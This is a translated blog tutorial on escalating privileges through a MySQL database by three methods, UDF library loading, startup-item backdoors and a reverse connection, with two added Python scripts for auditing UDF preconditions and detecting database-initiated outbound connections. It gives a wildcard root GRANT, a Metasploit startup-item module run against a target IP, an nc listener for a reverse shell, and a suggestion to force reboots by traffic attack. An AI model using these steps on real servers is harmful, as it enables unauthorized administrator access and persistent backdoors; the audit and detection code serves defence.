Privilege Escalation: MySQL Database (UDF || Startup Items || Bounce)


Privilege escalation (提权, sometimes rendered as "elevation of rights" in this article) means raising the privilege level we already hold. Since the operating system is a multi-user system, every user is subject to permission controls. For example, the permissions obtained through a web vulnerability are those of the web server process, and web services are usually started under an account with very low privileges. Some operations through a webshell will therefore be restricted, which is why we want to escalate to administrator or even SYSTEM privileges. Privileges are usually escalated through operating system vulnerabilities or misconfigurations, or through third-party services such as database or FTP software vulnerabilities.


Table of contents:

Privilege escalation approach:

MySQL database privilege escalation:

UDF privilege escalation:

Step 1: Service probing (port).

Step 2: Information collection.

Step 3: Escalate privileges.

Startup item privilege escalation:

Step 1: Open external connections.

Step 2: Use msf to escalate via the database.

Step 3: When the target host restarts, the backdoor is started. (To make the target host restart, you can use a traffic attack.)

Bounce (reverse-connection) privilege escalation:

Step 1: Listen on the attacking machine.

Step 2: Upload the MySQL privilege escalation tool for later access.

Step 3: Create the bounce function.

Step 4: Execute the reverse connection.

Step 5: Go back to Kali and check that the connection has come back.


Disclaimer:

It is strictly forbidden to use the technology mentioned in this article to carry out illegal attacks, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.


Privilege escalation approach:

When exploiting a system overflow vulnerability gets you nowhere, you can escalate through the database instead, but you need to know the prerequisites for database privilege escalation: the server runs a database service, and you have obtained the password of the user with the highest privileges. Apart from Access, essentially every database engine offers some possibility of privilege escalation.

Process: service probing -> information collection -> privilege escalation -> obtaining access.


Mysql database privilege escalation:

Database privilege escalation assumes that we already have a Trojan (webshell) or some other way of reaching the website's directory.

Default port information for databases:

1. MySQL: default port 3306;

2. Oracle: default port 1521;

3. SQL Server: default port 1433;

4. DB2: default port 5000;

5. PostgreSQL: default port 5432;

6. The domestic (Chinese) DM Dameng database: default port 5236;

7. Redis: default port 6379;

8. Memcached: default port 11211;

9. MongoDB: default port 27017;

UDF privilege escalation:

Step 1: Service probing (port).


Step 2: Information collection.

(1) Read the website's database configuration file (know the common naming conventions and how to search for it).

Keywords for locating database configuration files:

sql, data, inc, config, conn, database, common, include, ...


(2) Read the database's storage or backup files (know the storage format of the database and what the files contain).


Step 3: Escalate privileges.

The first thing to know before escalating is the database version number, because it decides where the UDF library has to be exported:

(1) MySQL < 5.1: export to c:/windows or system32

(2) MySQL >= 5.1: export to <installation directory>/lib/plugin/


(1) Look up the installation directory of the database:

select @@basedir;


(2) Copy the installation directory, open it, and go into the lib folder.


(3) Create the plugin directory. (Because the version is MySQL >= 5.1, this directory has to exist.)


(4) Copy the path of the plugin directory.


(5) Click Install DLL, then run the command you want to execute.


(6) Elevate privileges and add an administrator account. (Because I ran it twice here, the returned result says the account already exists.)
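The UDF method above only works when several server-side settings line up: file export is unrestricted (`secure_file_priv`), the version-dependent library directory is reachable and writable, a high-privilege account is usable, and a command-execution UDF gets registered in `mysql.func`. The following audit script is an added example for defenders and is not code from the original post; it evaluates those preconditions from query results you would fetch yourself (the SQL for each is given in the comments), and all the sample values, including the `plugin_dir_writable_by_service` flag, are constructed for the demonstration.

```python
"""Added audit example (not code from the original post): check the MySQL-side
preconditions the UDF method relies on.  All data below is constructed so the
script runs offline; on a real server feed it the results of the queries
named in the comments."""

# SHOW VARIABLES WHERE Variable_name IN ('version','basedir','plugin_dir','secure_file_priv');
# None stands for SQL NULL.  Constructed values mirror the article's Windows setup.
SAMPLE_VARIABLES = {
    "version": "5.7.26",
    "basedir": "C:\\phpstudy\\MySQL\\",
    "plugin_dir": "C:\\phpstudy\\MySQL\\lib\\plugin\\",
    "secure_file_priv": "",      # "" = no restriction on INTO OUTFILE / DUMPFILE
}
# SELECT name, dl FROM mysql.func;   (constructed)
SAMPLE_FUNCS = [("sys_eval", "udf.dll"), ("lib_mysqludf_sys_info", "udf.dll")]
# SELECT user, host, File_priv, Super_priv FROM mysql.user;   (constructed)
SAMPLE_USERS = [
    ("root", "localhost", "Y", "Y"),
    ("root", "%", "Y", "Y"),          # the over-broad 'root'@'%' grant used later in the article
    ("webapp", "localhost", "N", "N"),
]
# Function names exported by the commonly used command-execution UDF libraries
COMMAND_UDFS = {"sys_exec", "sys_eval", "sys_get", "sys_set", "cmdshell", "shell", "backshell"}


def parse_version(version):
    """'5.7.26-log' -> (5, 7)."""
    major, minor = version.split("-")[0].split(".")[:2]
    return int(major), int(minor)


def udf_library_dir(variables):
    """Where a UDF library must live, following the article's version split:
    a system directory before 5.1, plugin_dir from 5.1 onward."""
    if parse_version(variables["version"]) >= (5, 1):
        return variables["plugin_dir"]
    return "<system directory>"


def audit_variables(variables, plugin_dir_writable_by_service):
    """Flag file-export and plugin directory settings that make a UDF drop possible."""
    findings = []
    sfp = variables.get("secure_file_priv")
    if sfp == "":
        findings.append("secure_file_priv is empty: INTO DUMPFILE may write to any path "
                        "the service account can reach")
    elif sfp is not None and parse_version(variables["version"]) >= (5, 1) \
            and variables["plugin_dir"].lower().startswith(sfp.lower()):
        findings.append("secure_file_priv covers plugin_dir, so file export can still "
                        "place a library there")
    # sfp is None (SQL NULL) means file import/export is disabled entirely.
    if plugin_dir_writable_by_service:   # constructed flag; check ACLs on the real host
        findings.append("plugin_dir is writable by the mysqld service account")
    return findings


def audit_funcs(rows):
    """Every registered UDF deserves review; known command-execution names are flagged."""
    findings = []
    for name, dl in rows:
        tag = "command-execution UDF" if name.lower() in COMMAND_UDFS else "registered UDF (review)"
        findings.append(f"{tag}: {name} from {dl}")
    return findings


def audit_users(rows):
    """Flag accounts whose FILE/SUPER privileges are usable from any host."""
    findings = []
    for user, host, file_priv, super_priv in rows:
        powerful = file_priv == "Y" or super_priv == "Y"
        if host == "%" and powerful:
            findings.append(f"{user}@{host}: FILE/SUPER privileges reachable from any host")
        elif file_priv == "Y" and user != "root":
            findings.append(f"{user}@{host}: non-root account holds FILE")
    return findings


def audit(variables=SAMPLE_VARIABLES, funcs=SAMPLE_FUNCS, users=SAMPLE_USERS,
          plugin_dir_writable_by_service=True):
    return {
        "udf_library_dir": udf_library_dir(variables),
        "variables": audit_variables(variables, plugin_dir_writable_by_service),
        "funcs": audit_funcs(funcs),
        "users": audit_users(users),
    }


if __name__ == "__main__":
    for section, items in audit().items():
        print(section)
        for item in (items if isinstance(items, list) else [items]):
            print("  -", item)
```

On the constructed sample every check fires except the non-root FILE rule, which is the picture the article's walkthrough implies. Setting `secure_file_priv` to NULL (or to a directory that does not contain `plugin_dir`), keeping `plugin_dir` read-only for the service account, and restricting `root` to `localhost` remove the preconditions one by one.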


Startup item privilege escalation:

Export a custom executable into the startup directory and have it run when the machine restarts:
write the prepared backdoor or executable into the server's startup items, then rely on a restart to execute it!

Step 1: Open external connections.

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;


Step 2: Use msf to escalate via the database.

msfconsole


use exploit/windows/mysql/mysql_start_up        // use the external-connection module.


show options            // view the options the module needs.


set rhosts 192.168.0.102            // set the target host IP address.
set username root                     // set the database username.
set password root                    // set the database password.
run            // run the module to upload the file.

Step 3: When the target host restarts, the backdoor is started. (To make the target host restart, you can use a traffic attack.)


Bounce (reverse-connection) privilege escalation:

Step 1: Listen on the attacking machine.

nc -l -p 5577


Step 2: Upload the MySQL privilege escalation tool for later access.


Step 3: Create the bounce function.


Step 4: Execute the reverse connection.


Step 5: Go back to Kali and check that the connection has come back.
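From the host side, the bounce method looks like a database server doing two things it never does in normal operation: initiating an outbound TCP connection (here to the listener on port 5577) and spawning a child process. The following detection script is an added example, not part of the original post; the log format it parses is constructed for the demonstration, and in practice you would map your own telemetry (for example Sysmon network-connection and process-creation events) onto the same fields. The `allowed_peers` parameter is an assumption standing in for known replication partners.

```python
"""Added detection example (not code from the original post): flag a MySQL
service that opens an outbound connection or spawns a child process, which is
how the reverse-connection ("bounce") method appears on the host.
The telemetry format below is constructed for this example."""
import re

# Constructed sample telemetry.  NET = network connection, PROC = process creation.
SAMPLE_LOG = """\
2024-05-01T10:00:01 NET proc=mysqld.exe pid=1420 dir=in src=192.168.0.100:51234 dst=192.168.0.102:3306
2024-05-01T10:00:07 NET proc=mysqld.exe pid=1420 dir=out src=192.168.0.102:49811 dst=192.168.0.100:5577
2024-05-01T10:00:07 PROC parent=mysqld.exe ppid=1420 image=cmd.exe pid=3356
2024-05-01T10:00:09 NET proc=httpd.exe pid=2210 dir=out src=192.168.0.102:49812 dst=93.184.216.34:443
2024-05-01T10:01:00 NET proc=mysqld.exe pid=1420 dir=out src=192.168.0.102:49900 dst=10.0.0.5:3306
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kind>NET|PROC)\s+(?P<rest>.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")
DB_PROCESSES = {"mysqld", "mysqld.exe", "mysqld-nt.exe"}


def parse_line(line):
    """Turn one constructed log line into a dict of its key=value fields."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    event = dict(KV_RE.findall(m.group("rest")))
    event["ts"], event["kind"] = m.group("ts"), m.group("kind")
    return event


def detect(log_text, allowed_peers=frozenset()):
    """Return (timestamp, reason) alerts for outbound connections initiated by the
    database process to hosts outside allowed_peers, and for any child process
    of the database process."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["kind"] == "NET" and ev.get("proc") in DB_PROCESSES and ev.get("dir") == "out":
            host, port = ev["dst"].rsplit(":", 1)
            if host not in allowed_peers:
                alerts.append((ev["ts"], f"{ev['proc']} initiated outbound connection to {host}:{port}"))
        elif ev["kind"] == "PROC" and ev.get("parent") in DB_PROCESSES:
            alerts.append((ev["ts"], f"{ev['parent']} spawned {ev['image']}"))
    return alerts


if __name__ == "__main__":
    # 10.0.0.5 is a constructed replication partner, so its connection is expected.
    for ts, reason in detect(SAMPLE_LOG, allowed_peers={"10.0.0.5"}):
        print(ts, reason)
```

The inbound connection to 3306 and the web server's outbound HTTPS are ignored, while the connection to the listener port and the `cmd.exe` child of `mysqld.exe` each produce an alert. Because the database process normally never initiates connections except to replication peers, the allowlist can stay very short, which keeps this rule low-noise.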

Fixing problems with installing the DLL: https://www.cnblogs.com/awrrays/p/11371522.html


Origin blog.csdn.net/weixin_54977781/article/details/130383561